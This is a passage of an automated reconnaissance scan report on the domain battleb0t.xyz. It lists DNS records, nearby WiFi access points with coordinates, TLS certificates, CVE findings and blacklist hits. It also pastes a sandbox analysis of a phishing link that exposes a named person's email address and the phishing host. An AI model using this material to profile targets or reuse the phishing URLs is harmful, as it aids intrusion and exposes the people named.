"2023-03-22T11:26:45.995844714Z"}, "blog.ciberviler.top": {"record_type": "CNAME", "resolved_at": "2023-05-03T22:00:04.200012079Z"}, "selfcare.reemglasco.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:53:55.389091114Z"}, "www.aksharaa-stories.in": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:01:24.104478961Z"}, "politicadedatos.cdmx.gob.mx": {"record_type": "CNAME", "resolved_at": "2023-04-20T22:14:34.638861478Z"}, "blog.669.icu": {"record_type": "CNAME", "resolved_at": "2023-04-30T23:01:16.804648755Z"}, "www.nino.ie": {"record_type": "CNAME", "resolved_at": "2022-11-15T14:39:48.329300690Z"}, "gtmo.verifyip.dev": {"record_type": "CNAME", "resolved_at": "2023-03-18T04:57:31.930831771Z"}, "dilipmishra.in": {"record_type": "AAAA", "resolved_at": "2023-04-20T09:39:39.449912783Z"}, "www.icrat.org": {"record_type": "CNAME", "resolved_at": "2023-02-24T18:57:48.570890826Z"}, "v2.ook.web.id": {"record_type": "CNAME", "resolved_at": "2023-03-22T18:06:45.316235566Z"}, "webscience.aareet.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T13:10:37.642950908Z"}, "bsrcode.in": {"record_type": "AAAA", "resolved_at": "2023-03-10T15:26:40.826334961Z"}, "chaobai-li.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-21T01:31:06.446449174Z"}, "gennymcdonagh.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-20T01:52:08.452932867Z"}, "apidocs.skycore.com": {"record_type": "CNAME", "resolved_at": "2023-02-24T14:41:26.009078406Z"}, "spirit.javve.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T02:19:30.097488621Z"}, "www.harmlessmachines.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T15:30:55.779483006Z"}, "inwave.ee.iith.ac.in": {"record_type": "CNAME", "resolved_at": "2023-04-30T23:00:58.357496950Z"}, "atf.accmp.co.in": {"record_type": "CNAME", "resolved_at": "2022-10-12T15:02:53.176642383Z"}, "www.cybercell.in": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:50:33.435276887Z"}, "haz.gyb.hu": {"record_type": 
"CNAME", "resolved_at": "2023-04-03T17:32:33.353464423Z"}, "www.albrt.in": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:50:47.473965264Z"}, "volnt.github.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T12:15:25.538707631Z"}, "www.undef.im": {"record_type": "CNAME", "resolved_at": "2023-03-16T15:22:57.341657363Z"}, "www.jesl.in": {"record_type": "CNAME", "resolved_at": "2023-03-18T23:46:46.131431289Z"}, "www.utopianhealing.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T22:37:02.294230539Z"}, "hstory.cn": {"record_type": "CNAME", "resolved_at": "2023-03-23T13:22:41.980546226Z"}, "pansypotter.gq": {"record_type": "AAAA", "resolved_at": "2023-01-05T15:01:42.622173547Z"}, "www.wsbrunson.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T15:38:39.587595975Z"}, "www.divisionthegame.com": {"record_type": "CNAME", "resolved_at": "2022-11-24T13:19:50.972528321Z"}, "proofcafe.github.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T14:18:15.798052993Z"}, "weather.boff.in": {"record_type": "CNAME", "resolved_at": "2023-04-18T17:20:47.664757665Z"}, "cocoyunxyz.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-18T23:52:21.760457760Z"}, "www.x3pi.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:23:11.859917505Z"}, "cassiehlinka.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-24T16:10:58.121319192Z"}, "chinese.yijun.hu": {"record_type": "CNAME", "resolved_at": "2023-03-07T16:05:40.493292434Z"}, "corporateaward.skoch.in": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:24:29.350893299Z"}, "www.trich.im": {"record_type": "CNAME", "resolved_at": "2023-04-14T22:00:26.714697755Z"}, "go.openset.wang": {"record_type": "CNAME", "resolved_at": "2023-04-13T07:10:38.860870061Z"}, "www.lokjivan.in": {"record_type": "CNAME", "resolved_at": "2023-03-21T01:23:15.353939327Z"}, "fosterinfotech.com": {"record_type": "AAAA", "resolved_at": "2023-04-15T14:30:18.377726429Z"}, "dmitryz.com": {"record_type": "AAAA", 
"resolved_at": "2023-03-22T10:34:37.477220368Z"}, "www.devondcl.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T14:20:27.865441511Z"}, "www.howtocanada.ru": {"record_type": "CNAME", "resolved_at": "2023-04-19T23:22:52.845993267Z"}}, "names": ["polothil.github.com", "docs.cashwarden.com", "v2.ook.web.id", "alexsong.group", "webscience.aareet.com" | 2606:50c0:8001::153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:11:95:71:3F:FA) | 32.8608, -79.9746 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 55 2nd PMO (Net ID: 00:01:21:10:85:60) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | funny.battleb0t.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a9:fd:fd:93:70:29:b0:48:11:c8:ce:bf:67:f2:09:f0:18:36:
72:e2:d5:45:1a:22:98:73:7b:fc:63:f5:37:b4:8e:20:c8:45:
e4:ce:e2:9e:72:73:e8:ad:47:bf:c0:35:30:a0:a9:68:42:7b:
af:a0:57:45:fd:5a:91:a4:2e:d5:a2:69:b2:ca:b8:65:ec:5c:
97:2b:5a:c2:47:61:9f:c4:81:87:89:15:e0:4d:14:10:00:57:
de:30:17:e4:75:38:ea:ab:0b:a9:2e:0e:a3:de:bf:1e:49:35:
76:16:95:0e:f2:76:59:a6:60:31:e4:31:da:5e:f7:3d:1a:b6:
45:fb:43:8b:75:fa:55:4a:bf:3c:53:c5:63:68:3b:09:79:60:
3e:59:90:9c:6f:29:ba:5e:2e:69:99:fe:bf:eb:b8:a8:a2:e5:
6a:e1:ab:7d:7b:0c:fc:a2:d8:0c:8f:d2:5f:a3:53:b9:f8:44:
96:05:f5:bc:85:79:5a:77:18:35:7d:ad:c6:2f:17:ce:cc:e8:
15:70:ec:81:d3:7e:77:0e:2a:9b:e5:1b:d9:8c:57:bd:a3:bc:
0a:e0:67:62:79:dd:4b:90:cc:e8:41:75:b0:89:34:3b:68:0e:
36:40:32:41:3e:6c:17:bc:5d:a4:cc:91:d3:38:4a:ce:c8:1b:
ab:60:7c:08
|
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-20677
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.48): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/battleb0t | battleb0t |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 6 | 0 | 1 | 0 | None | skip.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:10:37 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.154:80 | 185.199.108.0/24 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.79 | 34.74.170.74 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000000jihyun.github.io]
https://www.openphish.com/feed.txt | 000000jihyun.github.io |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.194): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | phi (Net ID: 00:06:B1:2D:D2:D1) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | curealty (Net ID: 00:0C:41:49:32:21) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:05:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nuke.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 42 (Net ID: 00:01:03:7C:0D:EE) | 52.3759, 4.8975 |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | benjamin.mckenzie@atimetals.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c04_IE_EarlyTabStart_0x8b0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.66.40.106:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "191.101.3.40:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "llink.to"\n "track.salesflare.com"\n "west.exchserverdata.one"\n "www.guelphcrc.ca"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "CabB51E.tmp" has type "data"- Location: [%TEMP%\\CabB51E.tmp]- [targetUID: 00000000-00002300]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFEEE2751A29384183.TMP" has type "data"- Location: [%TEMP%\\~DFEEE2751A29384183.TMP]- [targetUID: 00000000-00003076]\n "~DFFC90A9F2586EA360.TMP" has type "data"- Location: [%TEMP%\\~DFFC90A9F2586EA360.TMP]- [targetUID: 00000000-00003076]\n "~DFEF4FBE98200F22B4.TMP" has type "data"- Location: [%TEMP%\\~DFEF4FBE98200F22B4.TMP]- [targetUID: 00000000-00003076]\n "~DFE92125FE943442B9.TMP" has type "data"- Location: [%TEMP%\\~DFE92125FE943442B9.TMP]- [targetUID: 00000000-00003076]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "_BCFD0E53-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._BCFD0E51-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C766E17C-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002300]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "PZ85YNQQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PZ85YNQQ.txt]- [targetUID: 
00000000-00003076]\n "P9VT4ER8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P9VT4ER8.txt]- [targetUID: 00000000-00003076]\n "QUTHNHLH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QUTHNHLH.txt]- [targetUID: 00000000-00003076]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "EAMNLP61.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EAMNLP61.txt]- [targetUID: 00000000-00003076]\n "benjamin.mckenzie@atimetals_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "II6KA114.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\II6KA114.txt]- [targetUID: 00000000-00003076]\n "B2FNP7N6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B2FNP7N6.txt]- [targetUID: 00000000-00003076]\n "QO8K1B53.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QO8K1B53.txt]- [targetUID: 00000000-00003076]\n "CabB51F.tmp" has type "data"- Location: [%TEMP%\\CabB51F.tmp]- [targetUID: 00000000-00002300]\n "CabC118.tmp" has type "data"- Location: [%TEMP%\\CabC118.tmp]- [targetUID: 00000000-00002300]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "CabC13A.tmp" has type "data"- Location: [%TEMP%\\CabC13A.tmp]- [targetUID: 00000000-00002300]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "6O2TX2Q0.htm" has type "HTML document ASCII text"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\6O2TX2Q0.htm]- [targetUID: 00000000-00002300]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.guelphcrc.ca" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com"\n Pattern match: "https://llink.to"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115_EDGE_Vmicrosoft.com/921614563724831110587320756521031032115SRCHDAF=NOFORMmicrosoft.com/10243323789440310856102"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131micr"\n Pattern match: 
"921614563724831110587321084646031032115MUID1C22022E23466767041B1123220A6603msn.com/102514563724831110587321084646031032115"\n Pattern match: "https://west.exchserverdata.one/?email=YmVuamFtaW4ubWNrZW56aWVAYXRpbWV0YWxzLmNvbQ=="\n Pattern match: "MUIDB31E817B6939460D9349A04BB92D861F2ieonline.microsoft.com/921614563724831110587320756521031032115"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025103905676831068342321084646031032115"\n Pattern match: |
| 2023-05-12 02:44:15 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-108-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-108-153.github.com |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nuke.battleb0t.xyz |
| 2023-05-12 03:09:08 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.94 | 165.232.113.85 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.121): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01-edu.github.io]
https://www.openphish.com/feed.txt | 01-edu.github.io |
| 2023-05-12 02:53:06 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nuke.battleb0t.xyz |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 215.30.196.104.bc.googleusercontent.com | 104.196.30.215 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f8c5a3bb81a1b-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:27 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 23 22:31:46.387 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:E4:5D:77:E7:B9:FC:9E:AD:1C:B5:62:
14:DD:D8:A1:B9:93:A7:95:80:D0:27:BE:9B:FC:96:DD:
90:D7:C4:30:AA:02:20:05:D4:DE:FE:C2:15:EF:1B:42:
74:2D:E4:3F:4F:CB:73:3D:EC:7B:44:18:37:71:14:A8:
00:F1:6C:6D:6B:77:67
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Jan 23 22:31:46.397 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BD:22:C5:30:9F:6F:36:15:B7:D1:CA:
AD:CF:EB:D0:94:75:7F:1F:5A:28:FD:93:B5:75:02:8F:
D1:C6:87:41:2E:02:20:7C:52:E6:58:A4:8D:55:6A:69:
9C:2C:54:4C:7F:AC:22:28:8D:2B:54:D7:47:45:0A:C9:
6B:D8:24:59:2E:89:1F
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:90:aa:85:4e:91:c5:53:b9:d9:ce:56:8c:48:
a4:84:84:df:15:f2:f7:bf:4b:d6:de:72:8d:e4:36:65:23:71:
